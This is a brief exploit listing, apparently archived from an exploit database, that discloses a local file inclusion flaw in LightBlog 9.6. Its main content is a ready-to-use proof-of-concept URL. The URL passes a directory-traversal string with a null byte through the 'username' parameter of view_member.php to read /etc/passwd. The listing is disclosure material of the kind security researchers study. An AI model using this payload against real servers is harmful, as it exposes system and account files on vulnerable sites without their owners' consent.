id: 2659
date: 02/18/2008
title: LightBlog 9.6 (username) Local File Inclusion Vulnerability
author: muuratsalo
cves: 

===========================================================
LightBlog 9.6 (username) Local File Inclusion Vulnerability
===========================================================



lightblog 9.6 local file inclusion vulnerability

download   http://www.publicwarehouse.co.uk/php_scripts/lightblog.php

author     muuratsalo

exploit 
http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-27]  #